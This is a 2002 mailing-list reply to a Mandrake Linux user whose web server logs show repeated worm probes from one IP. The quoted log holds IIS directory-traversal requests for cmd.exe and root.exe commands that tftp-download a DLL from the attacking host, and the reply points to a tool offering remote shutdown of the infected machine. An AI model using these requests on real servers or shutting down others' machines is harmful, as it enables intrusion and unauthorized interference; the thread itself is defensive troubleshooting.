Re: [newbie] Can't block dos attack

civileme Sun, 28 Jul 2002 18:07:35 -0700

Ibly Piblo wrote:

>I am getting strange hits to my web server,
>I don't like it and I wish to know how
>to stop them from slipping past my defenses.
>
>I try using ipchains, most addresses are
>blocked, but for reasons I can't figure out,
>this address 65.192.23.150 keeps showing up.
>
>I don't understand it, if ipchains,
>/etc/hosts.deny can't block it, what can?
>
>Do I send back a command to shut down
>their server?
>
>How do I get the point accross?
>
>65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 342 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 358 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 400 308 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 400 308 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 325 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:08 -0500] "GET
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 325 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] "GET
>/scripts/root.exe?/c+dir HTTP/1.0" 200 87 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] "GET
>/scripts/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll
>HTTP/1.0" 200 87 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET
>/scripts/httpodbc.dll HTTP/1.0" 404 307 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET
>/MSADC/root.exe?/c+dir HTTP/1.0" 200 87 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET
>/MSADC/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll
>HTTP/1.0" 200 87 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET
>/MSADC/httpodbc.dll HTTP/1.0" 404 305 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] "GET
>/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-"
>"-"
>65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] "GET
>/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-"
>"-"
>65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] "GET
>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 325 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] "GET
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 342 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] "GET
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 342 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] "GET
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 358 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] "GET
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] "GET
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] "GET
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] "GET
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] "GET
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 400 308 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] "GET
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 400 308 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] "GET
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 325 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] "GET
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 325 "-" "
>


That is no DoS attack--tis the wailing of IIS infected trying to spread 
its misery.  

Go here...  Tis time to meet a friend.

http://pfortin.com/Linux/MSVTS/

And yes the remote shutdown is there.

While you are at it, you might want to make some more new friends

http://plf.zarb.org

Civileme

>

Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com

Re: [newbie] Can't block dos attack

Reply via email to